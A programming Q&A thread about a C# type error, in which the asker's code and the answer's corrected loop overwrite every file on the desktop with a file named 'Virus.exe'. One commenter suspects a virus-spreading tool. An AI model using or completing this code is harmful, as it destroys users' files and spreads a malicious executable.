# Can you convert an IEnumerated string to a normal string?

Tags: c#

I'm using this to find and replace exe files

```
public static void Replace()
{
    string origFile = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory) + "/Virus.exe"; //original file
    IEnumerable<string> toOverwrite = EnumerateFiles(); //newly enumarated files
    string backupFile = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory) + "/temp"; //backup file (temporary)
    File.Replace (origFile, toOverwrite, backupFile); //replaces files
}
public static IEnumerable<string> EnumerateFiles()
{
    string pathToSearch = Environment.GetFolderPath (Environment.SpecialFolder.DesktopDirectory); //Sets search directory to the desktop
    IEnumerable<string> exeFiles = Directory.EnumerateFiles (pathToSearch); //Searches desktop for all exe files
    return exeFiles; //Returns enumerated list of files
}
```

but when I do the File.Replace method, it tells me that I can't convert IEnumerable String to a normal String. How can I change the string type without changing the value?

Comment: Your EnumerateFiles could return more than one file name in that exeFiles. Also if you convert it I fail to see how you could use in the call to File.Replace that wants ONE file

Comment: A collection of strings is not a string. You need to loop over the collection and carry out `File.Replace` on each one.

Answer (score 2):

Thats beacuse IEnumeable is a bunch of strings. File.Replace wants one string. What you are trying to do doesnt make sense. I suspect you need to loop over the files in toOverwrite collection

```
public static void Replace()
        {
            string origFile = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory) + "/Virus.exe"; //original file
            IEnumerable<string> toOverwrite = EnumerateFiles(); //newly enumarated files
            string backupFile = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory) + "/temp"; //backup file (temporary)
           foreach(var file in toOverwrite)
          {
              File.Replace (origFile, file, backupFile); //replaces files
          }
}
```

Comment: I think `File.Replace` needs an actual file name for the backup and not just a directory.  As it is it will just continually overwrite a file called "temp".  Op probably would want a back up of each file?

Comment: All its code makes no sense. He has only one source file named VIRUS.EXE. In this way you are copying this file replacing all the files in the destination list.  Is this a virus spreading utility? :-)